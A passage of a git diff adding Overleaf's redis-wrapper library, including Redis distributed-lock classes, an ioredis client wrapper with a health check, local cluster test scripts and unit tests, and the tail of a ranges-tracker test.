p: 17, d: 'giraffe' } }, + ]) + }) + }) + + describe('with a tracked insert at the same position as a tracked delete', function () { + beforeEach(function () { + this.comments = [] + this.changes = [ + { + id: 'id1', + op: { p: 5, d: 'before' }, + metadata: { user_id: 'user-id' }, + }, + { + id: 'id2', + op: { p: 10, d: 'delete' }, + metadata: { user_id: 'user-id' }, + }, + { + id: 'id3', + op: { p: 10, i: 'insert' }, + metadata: { user_id: 'user-id' }, + }, + ] + this.rangesTracker = new RangesTracker(this.changes, this.comments) + }) + + it('places a tracked insert at the same position before both the delete and the insert', function () { + this.rangesTracker.track_changes = true + this.rangesTracker.applyOp( + { p: 10, i: 'incoming' }, + { user_id: 'user-id' } + ) + expect(this.rangesTracker.changes.map(change => change.op)).to.deep.equal( + [ + { p: 5, d: 'before' }, + { p: 10, i: 'incoming' }, + { p: 18, d: 'delete' }, + { p: 18, i: 'insert' }, + ] + ) + }) + }) +}) diff --git a/libraries/ranges-tracker/tsconfig.json b/libraries/ranges-tracker/tsconfig.json new file mode 100644 index 0000000..d43bb24 --- /dev/null +++ b/libraries/ranges-tracker/tsconfig.json @@ -0,0 +1,7 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "**/*.js", + "**/*.cjs" + ] +} diff --git a/libraries/redis-wrapper/.editorconfig b/libraries/redis-wrapper/.editorconfig new file mode 100644 index 0000000..44f520e --- /dev/null +++ b/libraries/redis-wrapper/.editorconfig @@ -0,0 +1,11 @@ +root = true + +[*] +charset = utf-8 +end_of_line = lf +indent_size = 2 +indent_style = space +insert_final_newline = true +max_line_length = 79 +tab_width = 4 +trim_trailing_whitespace = true diff --git a/libraries/redis-wrapper/.gitignore b/libraries/redis-wrapper/.gitignore new file mode 100644 index 0000000..eac2002 --- /dev/null +++ b/libraries/redis-wrapper/.gitignore @@ -0,0 +1,13 @@ +**.swp + +app.js +app/js/ +test/unit/js/ +public/build/ + +node_modules/ + +/public/js/chat.js 
+plato/
+
+.npmrc
diff --git a/libraries/redis-wrapper/.mocharc.json b/libraries/redis-wrapper/.mocharc.json
new file mode 100644
index 0000000..dc3280a
--- /dev/null
+++ b/libraries/redis-wrapper/.mocharc.json
@@ -0,0 +1,3 @@
+{
+  "require": "test/setup.js"
+}
diff --git a/libraries/redis-wrapper/.nvmrc b/libraries/redis-wrapper/.nvmrc
new file mode 100644
index 0000000..0254b1e
--- /dev/null
+++ b/libraries/redis-wrapper/.nvmrc
@@ -0,0 +1 @@
+20.18.2
diff --git a/libraries/redis-wrapper/Errors.js b/libraries/redis-wrapper/Errors.js
new file mode 100644
index 0000000..b3b3ec0
--- /dev/null
+++ b/libraries/redis-wrapper/Errors.js
@@ -0,0 +1,15 @@
+const OError = require('@overleaf/o-error')
+
+class RedisError extends OError {}
+class RedisHealthCheckFailed extends RedisError {}
+class RedisHealthCheckTimedOut extends RedisHealthCheckFailed {}
+class RedisHealthCheckWriteError extends RedisHealthCheckFailed {}
+class RedisHealthCheckVerifyError extends RedisHealthCheckFailed {}
+
+module.exports = {
+  RedisError,
+  RedisHealthCheckFailed,
+  RedisHealthCheckTimedOut,
+  RedisHealthCheckWriteError,
+  RedisHealthCheckVerifyError,
+}
diff --git a/libraries/redis-wrapper/Readme.md b/libraries/redis-wrapper/Readme.md
new file mode 100644
index 0000000..e69de29
diff --git a/libraries/redis-wrapper/RedisLocker.js b/libraries/redis-wrapper/RedisLocker.js
new file mode 100644
index 0000000..b819ad2
--- /dev/null
+++ b/libraries/redis-wrapper/RedisLocker.js
@@ -0,0 +1,225 @@
+const { promisify } = require('node:util')
+const metrics = require('@overleaf/metrics')
+const logger = require('@overleaf/logger')
+const os = require('node:os')
+const crypto = require('node:crypto')
+
+const HOST = os.hostname()
+const PID = process.pid
+const RND = crypto.randomBytes(4).toString('hex')
+let COUNT = 0
+
+const MAX_REDIS_REQUEST_LENGTH = 5000 // 5 seconds
+
+const UNLOCK_SCRIPT =
+  'if redis.call("get", KEYS[1]) == ARGV[1] then return redis.call("del", KEYS[1]) else return 0 end'
+
+module.exports = class RedisLocker {
+  /**
+   * @param {import('ioredis')} rclient initialized ioredis client
+   * @param {function(string): string} getKey compose the redis key based on the passed id
+   * @param {function(Error, string): Error} wrapTimeoutError assign the id to a designated field on the error
+   * @param {string} metricsPrefix prefix all the metrics with the given prefix
+   * @param {number} lockTTLSeconds
+   *
+   * @example ```
+   * const lock = new RedisLocker({
+   *   rclient,
+   *   getKey(userId) { return `blocking:${userId}` },
+   *   wrapTimeoutError(err, userId) { err.userId = userId; return err },
+   *   metricsPrefix: 'user',
+   * })
+   *
+   * lock.getLock(user._id, (err, value) => {
+   *   if (err) return callback(err)
+   *   // do work
+   *   lock.releaseLock(user._id, callback)
+   * })
+   * ```
+   */
+  constructor({
+    rclient,
+    getKey,
+    wrapTimeoutError,
+    metricsPrefix,
+    lockTTLSeconds = 30,
+  }) {
+    if (
+      typeof lockTTLSeconds !== 'number' ||
+      lockTTLSeconds < 30 ||
+      lockTTLSeconds >= 1000
+    ) {
+      // set upper limit to 1000s to detect wrong units
+      throw new Error('redis lock TTL must be at least 30s and below 1000s')
+    }
+
+    this.rclient = rclient
+    this.getKey = getKey
+    this.wrapTimeoutError = wrapTimeoutError
+    this.metricsPrefix = metricsPrefix
+
+    this.LOCK_TEST_INTERVAL = 50 // 50ms between each test of the lock
+    this.MAX_TEST_INTERVAL = 1000 // back off to 1s between each test of the lock
+    this.MAX_LOCK_WAIT_TIME = 10000 // 10s maximum time to spend trying to get the lock
+    this.LOCK_TTL = lockTTLSeconds // seconds.
Time until lock auto expires in redis. + + // read-only copy for unit tests + this.unlockScript = UNLOCK_SCRIPT + + this.promises = { + checkLock: promisify(this.checkLock.bind(this)), + getLock: promisify(this.getLock.bind(this)), + releaseLock: promisify(this.releaseLock.bind(this)), + + // tryLock returns two values: gotLock and lockValue. We need to merge + // these two values into one for the promises version. + tryLock: id => + new Promise((resolve, reject) => { + this.tryLock(id, (err, gotLock, lockValue) => { + if (err) { + reject(err) + } else if (!gotLock) { + resolve(null) + } else { + resolve(lockValue) + } + }) + }), + } + } + + // Use a signed lock value as described in + // https://redis.io/docs/reference/patterns/distributed-locks/#correct-implementation-with-a-single-instance + // to prevent accidental unlocking by multiple processes + randomLock() { + const time = Date.now() + return `locked:host=${HOST}:pid=${PID}:random=${RND}:time=${time}:count=${COUNT++}` + } + + /** + * @param {Callback} callback + */ + tryLock(id, callback) { + if (callback == null) { + callback = function () {} + } + const lockValue = this.randomLock() + const key = this.getKey(id) + const startTime = Date.now() + return this.rclient.set( + key, + lockValue, + 'EX', + this.LOCK_TTL, + 'NX', + (err, gotLock) => { + if (err != null) { + return callback(err) + } + if (gotLock === 'OK') { + metrics.inc(this.metricsPrefix + '-not-blocking') + const timeTaken = Date.now() - startTime + if (timeTaken > MAX_REDIS_REQUEST_LENGTH) { + // took too long, so try to free the lock + return this.releaseLock(id, lockValue, function (err, result) { + if (err != null) { + return callback(err) + } // error freeing lock + return callback(null, false) + }) // tell caller they didn't get the lock + } else { + return callback(null, true, lockValue) + } + } else { + metrics.inc(this.metricsPrefix + '-blocking') + return callback(null, false) + } + } + ) + } + + /** + * @param {Callback} callback + */ + getLock(id, callback) { + if (callback == null) { + callback = function () {} + } + const startTime = Date.now() + let testInterval = this.LOCK_TEST_INTERVAL + const attempt = () => { + if (Date.now() - startTime > this.MAX_LOCK_WAIT_TIME) { + const e = this.wrapTimeoutError(new Error('Timeout'), id) + return callback(e) + } + + return this.tryLock(id, (error, gotLock, lockValue) => { + if (error != null) { + return callback(error) + } + if (gotLock) { + return callback(null, lockValue) + } else { + setTimeout(attempt, testInterval) + // back off when the lock is taken to avoid overloading + return (testInterval = Math.min( + testInterval * 2, + this.MAX_TEST_INTERVAL + )) + } + }) + } + attempt() + } + + /** + * @param {Callback} callback + */ + checkLock(id, callback) { + if (callback == null) { + callback = function () {} + } + const key = this.getKey(id) + return this.rclient.exists(key, (err, exists) => { + if (err != null) { + return callback(err) + } + exists = parseInt(exists) + if (exists === 1) { + metrics.inc(this.metricsPrefix + '-blocking') + return callback(null, false) + } else { + metrics.inc(this.metricsPrefix + '-not-blocking') + return callback(null, true) + } + }) + } + + /** + * @param {Callback} callback + */ + releaseLock(id, lockValue, callback) { + const key = this.getKey(id) + return this.rclient.eval( + UNLOCK_SCRIPT, + 1, + key, + lockValue, + (err, result) => { + if (err != null) { + return callback(err) + } else if (result != null && result !== 1) { + // successful unlock should release exactly 
one key
+          logger.error(
+            { id, key, lockValue, redis_err: err, redis_result: result },
+            'unlocking error'
+          )
+          metrics.inc(this.metricsPrefix + '-unlock-error')
+          return callback(new Error('tried to release timed out lock'))
+        } else {
+          return callback(null, result)
+        }
+      }
+    )
+  }
+}
diff --git a/libraries/redis-wrapper/RedisWebLocker.js b/libraries/redis-wrapper/RedisWebLocker.js
new file mode 100644
index 0000000..dac315b
--- /dev/null
+++ b/libraries/redis-wrapper/RedisWebLocker.js
@@ -0,0 +1,207 @@
+const { callbackify, promisify } = require('node:util')
+const metrics = require('@overleaf/metrics')
+const logger = require('@overleaf/logger')
+const os = require('node:os')
+const crypto = require('node:crypto')
+const async = require('async')
+
+const HOST = os.hostname()
+const PID = process.pid
+const RND = crypto.randomBytes(4).toString('hex')
+let COUNT = 0
+
+const LOCK_QUEUES = new Map() // queue lock requests for each name/id so they get the lock on a first-come first-served basis
+
+const UNLOCK_SCRIPT =
+  'if redis.call("get", KEYS[1]) == ARGV[1] then return redis.call("del", KEYS[1]) else return 0 end'
+
+module.exports = class RedisWebLocker {
+  constructor({ rclient, getKey, options }) {
+    this.rclient = rclient
+    this.getKey = getKey
+
+    // ms between each test of the lock
+    this.LOCK_TEST_INTERVAL = options.lockTestInterval || 50
+    // back off to this many ms between each test of the lock
+    this.MAX_TEST_INTERVAL = options.maxTestInterval || 1000
+    // ms maximum time to spend trying to get the lock
+    this.MAX_LOCK_WAIT_TIME = options.maxLockWaitTime || 10000
+    // seconds. Time until lock auto expires in redis
+    this.REDIS_LOCK_EXPIRY = options.redisLockExpiry || 30
+    // ms, if execution takes longer than this then log
+    this.SLOW_EXECUTION_THRESHOLD = options.slowExecutionThreshold || 5000
+    // read-only copy for unit tests
+    this.unlockScript = UNLOCK_SCRIPT
+
+    const promisifiedRunWithLock = promisify(this.runWithLock).bind(this)
+    this.promises = {
+      runWithLock(namespace, id, runner) {
+        const cbRunner = callbackify(runner)
+        return promisifiedRunWithLock(namespace, id, cbRunner)
+      },
+    }
+  }
+
+  // Use a signed lock value as described in
+  // http://redis.io/topics/distlock#correct-implementation-with-a-single-instance
+  // to prevent accidental unlocking by multiple processes
+  randomLock() {
+    const time = Date.now()
+    return `locked:host=${HOST}:pid=${PID}:random=${RND}:time=${time}:count=${COUNT++}`
+  }
+
+  runWithLock(namespace, id, runner, callback) {
+    // runner must be a function accepting a callback, e.g. runner = cb => { ... }
+
+    // This error is defined here so we get a useful stacktrace
+    const slowExecutionError = new Error('slow execution during lock')
+
+    const timer = new metrics.Timer(`lock.${namespace}`)
+    const key = this.getKey(namespace, id)
+    this._getLock(key, namespace, (error, lockValue) => {
+      if (error != null) {
+        return callback(error)
+      }
+
+      // The lock can expire in redis but the process can carry on. This setTimeout call
+      // is designed to log if this happens.
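+      // For example (illustrative numbers): with the default REDIS_LOCK_EXPIRY
+      // of 30s, a runner that takes 45s outlives its lock. Redis will have
+      // expired the key, another process may acquire it, and the timer below
+      // fires so that the overrun is counted in the metrics and logged.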
+ function countIfExceededLockTimeout() { + metrics.inc(`lock.${namespace}.exceeded_lock_timeout`) + logger.debug('exceeded lock timeout', { + namespace, + id, + slowExecutionError, + }) + } + const exceededLockTimeout = setTimeout( + countIfExceededLockTimeout, + this.REDIS_LOCK_EXPIRY * 1000 + ) + + runner((error1, ...values) => + this._releaseLock(key, lockValue, error2 => { + clearTimeout(exceededLockTimeout) + + const timeTaken = new Date() - timer.start + if (timeTaken > this.SLOW_EXECUTION_THRESHOLD) { + logger.debug('slow execution during lock', { + namespace, + id, + timeTaken, + slowExecutionError, + }) + } + + timer.done() + error = error1 || error2 + if (error != null) { + return callback(error) + } + callback(null, ...values) + }) + ) + }) + } + + _tryLock(key, namespace, callback) { + const lockValue = this.randomLock() + this.rclient.set( + key, + lockValue, + 'EX', + this.REDIS_LOCK_EXPIRY, + 'NX', + (err, gotLock) => { + if (err != null) { + return callback(err) + } + if (gotLock === 'OK') { + metrics.inc(`lock.${namespace}.try.success`) + callback(err, true, lockValue) + } else { + metrics.inc(`lock.${namespace}.try.failed`) + logger.debug({ key, redis_response: gotLock }, 'lock is locked') + callback(err, false) + } + } + ) + } + + // it's sufficient to serialize within a process because that is where the parallel operations occur + _getLock(key, namespace, callback) { + // this is what we need to do for each lock we want to request + const task = next => + this._getLockByPolling(key, namespace, (error, lockValue) => { + // tell the queue to start trying to get the next lock (if any) + next() + // we have got a lock result, so we can continue with our own execution + callback(error, lockValue) + }) + // create a queue for this key if needed + const queueName = `${key}:${namespace}` + let queue = LOCK_QUEUES.get(queueName) + if (queue == null) { + const handler = (fn, cb) => fn(cb) + // set up a new queue for this key + queue = async.queue(handler, 1) + queue.push(task) + // remove the queue object when queue is empty + queue.drain(() => { + LOCK_QUEUES.delete(queueName) + }) + // store the queue in our global map + LOCK_QUEUES.set(queueName, queue) + } else { + // queue the request to get the lock + queue.push(task) + } + } + + _getLockByPolling(key, namespace, callback) { + const startTime = Date.now() + const testInterval = this.LOCK_TEST_INTERVAL + let attempts = 0 + const attempt = () => { + if (Date.now() - startTime > this.MAX_LOCK_WAIT_TIME) { + metrics.inc(`lock.${namespace}.get.failed`) + return callback(new Error('Timeout')) + } + + attempts += 1 + this._tryLock(key, namespace, (error, gotLock, lockValue) => { + if (error != null) { + return callback(error) + } + if (gotLock) { + metrics.gauge(`lock.${namespace}.get.success.tries`, attempts) + callback(null, lockValue) + } else { + setTimeout(attempt, testInterval) + } + }) + } + attempt() + } + + _releaseLock(key, lockValue, callback) { + this.rclient.eval(this.unlockScript, 1, key, lockValue, (err, result) => { + if (err != null) { + callback(err) + } else if (result != null && result !== 1) { + // successful unlock should release exactly one key + logger.warn( + { key, lockValue, redis_err: err, redis_result: result }, + 'unlocking error' + ) + metrics.inc('unlock-error') + callback(new Error('tried to release timed out lock')) + } else { + callback(null, result) + } + }) + } + + _lockQueuesSize() { + return LOCK_QUEUES.size + } +} diff --git a/libraries/redis-wrapper/buildscript.txt 
b/libraries/redis-wrapper/buildscript.txt new file mode 100644 index 0000000..89de514 --- /dev/null +++ b/libraries/redis-wrapper/buildscript.txt @@ -0,0 +1,10 @@ +redis-wrapper +--dependencies=None +--docker-repos=gcr.io/overleaf-ops +--env-add= +--env-pass-through= +--esmock-loader=False +--is-library=True +--node-version=20.18.2 +--public-repo=False +--script-version=4.7.0 diff --git a/libraries/redis-wrapper/index.js b/libraries/redis-wrapper/index.js new file mode 100644 index 0000000..2e16014 --- /dev/null +++ b/libraries/redis-wrapper/index.js @@ -0,0 +1,173 @@ +const crypto = require('node:crypto') +const os = require('node:os') +const { promisify } = require('node:util') + +const Redis = require('ioredis') + +const { + RedisHealthCheckTimedOut, + RedisHealthCheckWriteError, + RedisHealthCheckVerifyError, +} = require('./Errors') + +const HEARTBEAT_TIMEOUT = 2000 + +// generate unique values for health check +const HOST = os.hostname() +const PID = process.pid +const RND = crypto.randomBytes(4).toString('hex') +let COUNT = 0 + +function createClient(opts) { + const standardOpts = Object.assign({}, opts) + delete standardOpts.key_schema + + if (standardOpts.retry_max_delay == null) { + standardOpts.retry_max_delay = 5000 // ms + } + + if (standardOpts.endpoints) { + throw new Error( + '@overleaf/redis-wrapper: redis-sentinel is no longer supported' + ) + } + + let client + if (standardOpts.cluster) { + delete standardOpts.cluster + client = new Redis.Cluster(opts.cluster, standardOpts) + } else { + client = new Redis(standardOpts) + } + monkeyPatchIoRedisExec(client) + client.healthCheck = callback => { + if (callback) { + // callback based invocation + healthCheck(client).then(callback).catch(callback) + } else { + // Promise based invocation + return healthCheck(client) + } + } + return client +} + +async function healthCheck(client) { + // check the redis connection by storing and retrieving a unique key/value pair + const uniqueToken = `host=${HOST}:pid=${PID}:random=${RND}:time=${Date.now()}:count=${COUNT++}` + + // o-error context + const context = { + uniqueToken, + stage: 'add context for a timeout', + } + + await runWithTimeout({ + runner: runCheck(client, uniqueToken, context), + timeout: HEARTBEAT_TIMEOUT, + context, + }) +} + +async function runCheck(client, uniqueToken, context) { + const healthCheckKey = `_redis-wrapper:healthCheckKey:{${uniqueToken}}` + const healthCheckValue = `_redis-wrapper:healthCheckValue:{${uniqueToken}}` + + // set the unique key/value pair + context.stage = 'write' + const writeAck = await client + .set(healthCheckKey, healthCheckValue, 'EX', 60) + .catch(err => { + throw new RedisHealthCheckWriteError('write errored', context, err) + }) + if (writeAck !== 'OK') { + context.writeAck = writeAck + throw new RedisHealthCheckWriteError('write failed', context) + } + + // check that we can retrieve the unique key/value pair + context.stage = 'verify' + const [roundTrippedHealthCheckValue, deleteAck] = await client + .multi() + .get(healthCheckKey) + .del(healthCheckKey) + .exec() + .catch(err => { + throw new RedisHealthCheckVerifyError( + 'read/delete errored', + context, + err + ) + }) + if (roundTrippedHealthCheckValue !== healthCheckValue) { + context.roundTrippedHealthCheckValue = roundTrippedHealthCheckValue + throw new RedisHealthCheckVerifyError('read failed', context) + } + if (deleteAck !== 1) { + context.deleteAck = deleteAck + throw new RedisHealthCheckVerifyError('delete failed', context) + } +} + +function unwrapMultiResult(result, 
callback) {
+  // ioredis exec returns results like:
+  //   [ [null, 42], [null, "foo"] ]
+  // where the first entries in each 2-tuple are
+  // presumably errors for each individual command,
+  // and the second entry is the result. We need to transform
+  // this into the same result as the old redis driver:
+  //   [ 42, "foo" ]
+  //
+  // Basically reverse:
+  // https://github.com/luin/ioredis/blob/v4.17.3/lib/utils/index.ts#L75-L92
+  const filteredResult = []
+  for (const [err, value] of result || []) {
+    if (err) {
+      return callback(err)
+    } else {
+      filteredResult.push(value)
+    }
+  }
+  callback(null, filteredResult)
+}
+const unwrapMultiResultPromisified = promisify(unwrapMultiResult)
+
+function monkeyPatchIoRedisExec(client) {
+  const _multi = client.multi
+  client.multi = function () {
+    const multi = _multi.apply(client, arguments)
+    const _exec = multi.exec
+    multi.exec = callback => {
+      if (callback) {
+        // callback based invocation
+        _exec.call(multi, (error, result) => {
+          // The command can fail all-together due to syntax errors
+          if (error) return callback(error)
+          unwrapMultiResult(result, callback)
+        })
+      } else {
+        // Promise based invocation
+        return _exec.call(multi).then(unwrapMultiResultPromisified)
+      }
+    }
+    return multi
+  }
+}
+
+async function runWithTimeout({ runner, timeout, context }) {
+  let healthCheckDeadline
+  await Promise.race([
+    new Promise((resolve, reject) => {
+      healthCheckDeadline = setTimeout(() => {
+        // attach the timeout when hitting the timeout only
+        context.timeout = timeout
+        reject(new RedisHealthCheckTimedOut('timeout', context))
+      }, timeout)
+    }),
+    runner.finally(() => clearTimeout(healthCheckDeadline)),
+  ])
+}
+
+module.exports = {
+  createClient,
+}
diff --git a/libraries/redis-wrapper/package.json b/libraries/redis-wrapper/package.json
new file mode 100644
index 0000000..2f15cb0
--- /dev/null
+++ b/libraries/redis-wrapper/package.json
@@ -0,0 +1,43 @@
+{
+  "name": "@overleaf/redis-wrapper",
+  "version": "2.1.0",
+  "description": "Redis wrapper for node which will either use cluster or single instance redis",
+  "main": "index.js",
+  "files": [
+    "index.js",
+    "Errors.js",
+    "RedisLocker.js",
+    "RedisWebLocker.js"
+  ],
+  "author": "Overleaf (https://www.overleaf.com)",
+  "repository": "github:overleaf/redis-wrapper",
+  "license": "ISC",
+  "scripts": {
+    "lint": "eslint --ext .js --ext .cjs --ext .ts --max-warnings 0 --format unix .",
+    "lint:fix": "eslint --fix --ext .js --ext .cjs --ext .ts .",
+    "format": "prettier --list-different $PWD/'**/*.{js,cjs,ts}'",
+    "format:fix": "prettier --write $PWD/'**/*.{js,cjs,ts}'",
+    "test": "npm run lint && npm run format && npm run types:check && npm run test:unit",
+    "test:ci": "npm run test:unit",
+    "test:unit": "mocha --exit test/**/*.{js,cjs}",
+    "types:check": "tsc --noEmit"
+  },
+  "peerDependencies": {
+    "@overleaf/logger": "*",
+    "@overleaf/metrics": "*",
+    "@overleaf/o-error": "*"
+  },
+  "dependencies": {
+    "async": "^3.2.5",
+    "ioredis": "~4.27.1"
+  },
+  "devDependencies": {
+    "@overleaf/logger": "*",
+    "@overleaf/o-error": "*",
+    "chai": "^4.3.6",
+    "mocha": "^11.1.0",
+    "sandboxed-module": "^2.0.4",
+    "sinon": "^9.2.4",
+    "typescript": "^5.0.4"
+  }
+}
diff --git a/libraries/redis-wrapper/test/scripts/cluster/clear-dbs.sh b/libraries/redis-wrapper/test/scripts/cluster/clear-dbs.sh
new file mode 100755
index 0000000..650630b
--- /dev/null
+++ b/libraries/redis-wrapper/test/scripts/cluster/clear-dbs.sh
@@ -0,0 +1,4 @@
+while true; do
+  seq 0 8 \
+    | xargs -I% redis-cli -p 700% FLUSHALL > /dev/null
+done
diff --git a/libraries/redis-wrapper/test/scripts/cluster/cluster.js b/libraries/redis-wrapper/test/scripts/cluster/cluster.js
new file mode 100644
index 0000000..58d6c79
--- /dev/null
+++ b/libraries/redis-wrapper/test/scripts/cluster/cluster.js
@@ -0,0 +1,26 @@
+/*
+  execute this script with a redis cluster running to test the health check.
+  starting and stopping shards with this script running is a good test.
+
+  to create a new cluster, use $ ./create-cluster.sh
+  to run a chaos monkey, use $ ./clear-dbs.sh
+*/
+
+const redis = require('../../../')
+const logger = require('@overleaf/logger')
+
+const rclient = redis.createClient({
+  cluster: Array.from({ length: 9 }).map((value, index) => {
+    return { host: '127.0.0.1', port: 7000 + index }
+  }),
+})
+
+setInterval(() => {
+  rclient.healthCheck(err => {
+    if (err) {
+      logger.error({ err }, 'HEALTH CHECK FAILED')
+    } else {
+      logger.info('HEALTH CHECK OK')
+    }
+  })
+}, 1000)
diff --git a/libraries/redis-wrapper/test/scripts/cluster/create-cluster.sh b/libraries/redis-wrapper/test/scripts/cluster/create-cluster.sh
new file mode 100755
index 0000000..dd384a2
--- /dev/null
+++ b/libraries/redis-wrapper/test/scripts/cluster/create-cluster.sh
@@ -0,0 +1,73 @@
+#!/bin/bash
+
+# USAGE: $0 [NUMBER_OF_NODES, default: 9] [DATA_DIR, default: a new temp dir]
+#
+# ports are assigned from 7000 on
+#
+# NOTE: the cluster setup requires redis 5+
+
+set -ex
+
+COUNT=${1:-9}
+DATA=$2
+
+if [[ -z "$DATA" ]]; then
+  IS_TEMP=1
+  TEMP=`mktemp -d`
+  DATA="$TEMP"
+fi
+
+HAS_DATA=
+if [[ -e "$DATA/7000/node.conf" ]]; then
+  HAS_DATA=1
+fi
+
+PIDs=""
+
+cleanup() {
+  # ensure that we delete the temp dir, no matter how the kill cmd exits
+  set +e
+  # invoke kill with at least one PID
+  echo "$PIDs" | xargs -r kill
+  if [[ ! -z "$IS_TEMP" ]]; then
+    rm -rf "$TEMP"
+  fi
+}
+trap cleanup exit
+
+for NUM in `seq "$COUNT"`; do
+  PORT=`expr 6999 + "$NUM"`
+  CWD="$DATA/$PORT"
+  mkdir -p "$CWD"
+  pushd "$CWD"
+  redis-server \
+    --appendonly no \
+    --cluster-enabled yes \
+    --cluster-config-file node.conf \
+    --port "$PORT" \
+    --save "" \
+    > /dev/null \
+    &
+  PIDs="$PIDs $!"
+  popd
+done
+
+# initial nodes
+if [[ -z "$HAS_DATA" ]]; then
+  # confirm the setup
+  echo yes \
+    | redis-cli --cluster create 127.0.0.1:7000 127.0.0.1:7001 127.0.0.1:7002
+fi
+
+# scale up as requested
+for NUM in `seq 4 "$COUNT"`; do
+  PORT=`expr 6999 + "$NUM"`
+  GUARD="$DATA/$PORT/.joined"
+  if [[ !
-e "$GUARD" ]]; then + redis-cli --cluster add-node "127.0.0.1:$PORT" 127.0.0.1:7000 --cluster-slave + touch "$GUARD" + fi +done + +echo "CLUSTER IS READY" >&2 +wait diff --git a/libraries/redis-wrapper/test/scripts/standalone.js b/libraries/redis-wrapper/test/scripts/standalone.js new file mode 100644 index 0000000..1665e96 --- /dev/null +++ b/libraries/redis-wrapper/test/scripts/standalone.js @@ -0,0 +1,17 @@ +// execute this script with a redis container running to test the health check +// starting and stopping redis with this script running is a good test + +const redis = require('../../') +const logger = require('@overleaf/logger') + +const rclient = redis.createClient({ host: '127.0.0.1', port: '6379' }) + +setInterval(() => { + rclient.healthCheck(err => { + if (err) { + logger.error({ err }, 'HEALTH CHECK FAILED') + } else { + logger.info('HEALTH CHECK OK') + } + }) +}, 1000) diff --git a/libraries/redis-wrapper/test/setup.js b/libraries/redis-wrapper/test/setup.js new file mode 100644 index 0000000..6369c63 --- /dev/null +++ b/libraries/redis-wrapper/test/setup.js @@ -0,0 +1,9 @@ +const SandboxedModule = require('sandboxed-module') + +SandboxedModule.configure({ + sourceTransformers: { + removeNodePrefix: function (source) { + return source.replace(/require\(['"]node:/g, "require('") + }, + }, +}) diff --git a/libraries/redis-wrapper/test/unit/src/test.js b/libraries/redis-wrapper/test/unit/src/test.js new file mode 100644 index 0000000..a71dcf0 --- /dev/null +++ b/libraries/redis-wrapper/test/unit/src/test.js @@ -0,0 +1,219 @@ +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS206: Consider reworking classes to avoid initClass + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +require('chai').should() +const SandboxedModule = require('sandboxed-module') +const assert = require('node:assert') +const path = require('node:path') +const sinon = require('sinon') +const modulePath = path.join(__dirname, './../../../index.js') +const redisLockerModulePath = path.join(__dirname, './../../../RedisLocker.js') +const { expect } = require('chai') + +describe('index', function () { + beforeEach(function () { + let Cluster, IoRedis, ioredisConstructor + this.settings = {} + this.ioredisConstructor = ioredisConstructor = sinon.stub() + + this.ioredis = IoRedis = (function () { + let createIoRedis + IoRedis = class IoRedis { + static initClass() { + this.prototype.on = sinon.stub() + createIoRedis = ioredisConstructor + } + + constructor() { + return createIoRedis.apply(this, arguments) + } + } + IoRedis.initClass() + return IoRedis + })() + this.ioredis.Cluster = Cluster = (function () { + Cluster = class Cluster { + static initClass() { + this.prototype.on = sinon.stub() + } + + constructor(config, options) { + this.config = config + this.options = options + } + } + Cluster.initClass() + return Cluster + })() + this.redis = SandboxedModule.require(modulePath, { + requires: { + ioredis: this.ioredis, + }, + globals: { + process, + Buffer, + }, + }) + this.auth_pass = '1234 pass' + + this.RedisLocker = SandboxedModule.require(redisLockerModulePath, { + requires: { + '@overleaf/metrics': { + inc() {}, + }, + }, + globals: { + process, + Math, + Buffer, + }, + }) + }) + + describe('lock TTL', function () { + it('should throw an error when creating a client with wrong type', function () { + const createNewRedisLock = () => { + return new this.RedisLocker({ + lockTTLSeconds: '60', + }) + } + 
expect(createNewRedisLock).to.throw( + 'redis lock TTL must be at least 30s and below 1000s' + ) + }) + + it('should throw an error when creating a client with small TTL', function () { + const createNewRedisLock = () => { + return new this.RedisLocker({ + lockTTLSeconds: 1, + }) + } + expect(createNewRedisLock).to.throw( + 'redis lock TTL must be at least 30s and below 1000s' + ) + }) + + it('should throw an error when creating a client with huge TTL', function () { + const createNewRedisLock = () => { + return new this.RedisLocker({ + lockTTLSeconds: 30_000, + }) + } + expect(createNewRedisLock).to.throw( + 'redis lock TTL must be at least 30s and below 1000s' + ) + }) + }) + + describe('redis-sentinel', function () { + it('should throw an error when creating a client', function () { + const redisSentinelOptions = { + endpoints: ['127.0.0.1:1234', '127.0.0.1:2345', '127.0.0.1:3456'], + } + const createNewClient = () => { + this.redis.createClient(redisSentinelOptions) + } + expect(createNewClient).to.throw( + '@overleaf/redis-wrapper: redis-sentinel is no longer supported' + ) + }) + }) + + describe('single node redis', function () { + beforeEach(function () { + return (this.standardOpts = { + auth_pass: this.auth_pass, + port: 1234, + host: 'redis.mysite.env', + }) + }) + + it('should work without opts', function () { + this.redis.createClient() + }) + + it('should use the ioredis driver in single-instance mode if a non array is passed', function () { + const client = this.redis.createClient(this.standardOpts) + return assert.equal(client.constructor, this.ioredis) + }) + + return it('should call createClient for the ioredis driver in single-instance mode if a non array is passed', function () { + this.redis.createClient(this.standardOpts) + return this.ioredisConstructor + .calledWith(sinon.match(this.standardOpts)) + .should.equal(true) + }) + }) + + describe('cluster', function () { + beforeEach(function () { + this.cluster = [{ mock: 'cluster' }, { mock: 'cluster2' }] + this.extraOptions = { keepAlive: 100 } + return (this.settings = { + cluster: this.cluster, + redisOptions: this.extraOptions, + key_schema: { + foo(x) { + return `${x}` + }, + }, + }) + }) + + it('should pass the options correctly though with no options', function () { + const client = this.redis.createClient({ cluster: this.cluster }) + assert(client instanceof this.ioredis.Cluster) + return client.config.should.deep.equal(this.cluster) + }) + + it('should not pass the key_schema through to the driver', function () { + const client = this.redis.createClient({ + cluster: this.cluster, + key_schema: 'foobar', + }) + assert(client instanceof this.ioredis.Cluster) + client.config.should.deep.equal(this.cluster) + return expect(client.options).to.deep.equal({ retry_max_delay: 5000 }) + }) + + return it('should pass the options correctly though with additional options', function () { + const client = this.redis.createClient(this.settings) + assert(client instanceof this.ioredis.Cluster) + client.config.should.deep.equal(this.cluster) + // need to use expect here because of _.clone in sandbox + return expect(client.options).to.deep.equal({ + redisOptions: this.extraOptions, + retry_max_delay: 5000, + }) + }) + }) + + return describe('monkey patch ioredis exec', function () { + beforeEach(function () { + this.callback = sinon.stub() + this.results = [] + this.multiOrig = { exec: sinon.stub().yields(null, this.results) } + this.client = { multi: sinon.stub().returns(this.multiOrig) } + 
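+      // wiring note: the stubbed ioredis constructor returns this.client, so
+      // the createClient() call below monkey-patches this.client.multi().exec
+      // with the result-unwrapping logic under test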
